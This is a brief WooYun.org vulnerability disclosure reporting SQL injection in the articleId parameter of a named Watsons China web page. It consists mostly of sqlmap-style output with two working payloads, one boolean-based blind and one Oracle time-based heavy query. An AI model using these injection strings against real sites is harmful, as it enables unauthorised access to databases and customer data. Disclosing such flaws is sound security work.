WooYun.org

一个单引号引发的血案。
https://www.vip.watsons.com.cn/web/SubClub_CosmeticDetail.do?articleId= (GET)
Parameter: articleId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: articleId=6290' AND 7401=7401 AND 'GKJL'='GKJL
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: articleId=6290' AND 6552=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USE
RS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'kIVc'='kIVc
---